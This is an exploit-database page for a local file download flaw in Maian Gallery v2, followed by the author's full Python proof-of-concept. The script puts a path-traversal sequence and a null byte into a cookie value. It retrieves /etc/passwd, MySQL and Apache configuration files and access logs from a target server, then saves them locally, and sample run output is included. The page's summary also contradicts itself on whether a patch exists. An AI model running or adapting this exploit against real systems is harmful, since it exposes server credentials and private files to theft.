header-logo
Suggest Exploit
vendor:
Maian Gallery v2
by:
mr_me
5.5
CVSS
MEDIUM
Local File Download
CWE
Product Name: Maian Gallery v2
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu Linux 2.6.32 with PHP v5.3.2

Maian Gallery v2 Local File Download Exploit

This exploit takes advantage of a vulnerability in the Maian Gallery v2 software, allowing an attacker to download files from the target server. The vulnerability is related to the use of the file_get_contents() function, which has some limitations such as being unable to execute PHP code or read certain file types. The exploit has been tested on Ubuntu Linux 2.6.32 with PHP v5.3.2 and the register_globals setting turned off. The vulnerability was discovered by a PHP expert and has since been patched. This PoC (Proof of Concept) code is provided for educational purposes.

Mitigation:

Apply the patch provided by the vendor to fix the vulnerability. Ensure that the file_get_contents() function is used securely and that user input is properly validated and sanitized.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# This vulnerability uses file_get_contents()
# so we have some limitations, we cant execute PHP
# and we cant read files that the web server will
# interpret such as PHP, conf etc
#
# tested on: Ubuntu Linux 2.6.32 with php v5.3.2
# register_globals = Off
#
# PRIVATE 0DAY - code by mr_me
# Vulnerability found by my special PHP friend and is now patched, hence this PoC ;)
# 
# mr_me@1337:~$ sudo ~/maian.py -p 127.0.0.1:8080 -t localhost -d /maian_gallery/ -o /home/mr_me/
#
#		| ------------------------------------------------------------- |
#		|        -= Maian Gallery v2 Local File Download Exploit =      |
#		| ---------------------------[ by mr_me ]---------------------- |
#
# (+) Checking target @: http://localhost/maian_gallery/
#
# (+) Testing Proxy...
# (+) Proxy working! 127.0.0.1:8080
# (+) Building Handler..
# (+) File download is working!
# (+) Looking for remote configuration files and saving them to /home/mr_me/
# (+) Found file on remote host @ /var/log/apache2/access.log
# (+) Found file on remote host @ /etc/mysql/my.cnf
# (+) Found file on remote host @ /etc/passwd
# (!) Done!
#

import sys, os, httplib, socket, urllib2, re
from optparse import OptionParser

usage= "./%prog [<options>] -t [target] -d [directory] -o [output dir to save files]"
usage += "\nExample : ./%prog -p 203.167.876.54:80 -t localhost -d maian_gallery/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The target server")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="The dir path to maian gallery")
parser.add_option("-o", type="string", action="store", dest="outputDir",
                  help="Output dir to save all files")
(options, args) = parser.parse_args()

def banner():
    print "\n\t\t| ------------------------------------------------------------ |"
    print "\t\t|        -= Maian Gallery v2 Local File Download Exploit =-    |"
    print "\t\t| ---------------------------[ by mr_me ]--------------------- |\n"

if len(sys.argv) < 4:
	banner()
        parser.print_help()
        sys.exit(1)

def getProxy():
	try:
        	pr = httplib.HTTPConnection(options.proxy)
        	pr.connect()
        	proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
	except(socket.timeout):
                print "\n(-) Proxy Timed Out"
                sys.exit(1)
	except(),msg:
                print "\n(-) Proxy Failed"
                sys.exit(1)
	return proxy_handler

dltest = "etc/passwd"
dotDotSlash = '../../../../../../../../../'
findAllFiles = ['/var/log/apache2/access_log', '/var/log/apache2/access.log', 
'/etc/mysql/my.cnf', '/etc/my.cnf', '/etc/passwd', '/etc/apache2/httpd.conf']

if options.target[0:6] != 'http://':
	options.target = "http://" + options.target

def getRequest(localFile):
	if options.proxy:
		try:
        		proxyfier = urllib2.build_opener(getProxy())
        		proxyfier.addheaders = [('Cookie', 'PHPSESSID=d0tcacup9euftbsb9kd7r55db3; mgallery_theme_cookie='+dotDotSlash+localFile+"%00")]
        		check = proxyfier.open(options.target+options.directory).read()
		except urllib2.HTTPError, error:
                        check = error.read()
	else:
		try:
        		req = urllib2.Request(options.target+options.directory)
        		req.add_header('Cookie', 'PHPSESSID=d0tcacup9euftbsb9kd7r55db3; mgallery_theme_cookie='+dotDotSlash+localFile+"%00")
        		check = urllib2.urlopen(req).read()
		except urllib2.HTTPError, error:
			check = error.read()
	return check

banner()

print "(+) Checking target @: %s" % (options.target+options.directory)
if options.proxy:
	print "\n(+) Testing Proxy..."
	print "(+) Proxy working! %s" % (options.proxy)
	print "(+) Building Handler.."
check = getRequest(dltest)
if re.findall("root:x:", check):
	print "(+) File download is working!"
	print "(+) Looking for remote configuration files and saving them to %s" % (options.outputDir)
	for f in findAllFiles:
		checkFile = getRequest(f)
		if len(checkFile) > 0:
			print "(+) Found file on remote host @ %s" % (f)
			filenames = f.split('/') 
			try:
				ff = open(options.outputDir+filenames[len(filenames)-1]+'.txt','w')
				ff.write(checkFile)
				ff.close()
			except:
				print "(-) Cannot save remote files locally.. check your path"
	print "(!) Done!\n"			
else:
    	print "(-) Target not vulnerable to the file download vulnerability"

Navigation

Suggest Exploit

Services By CQR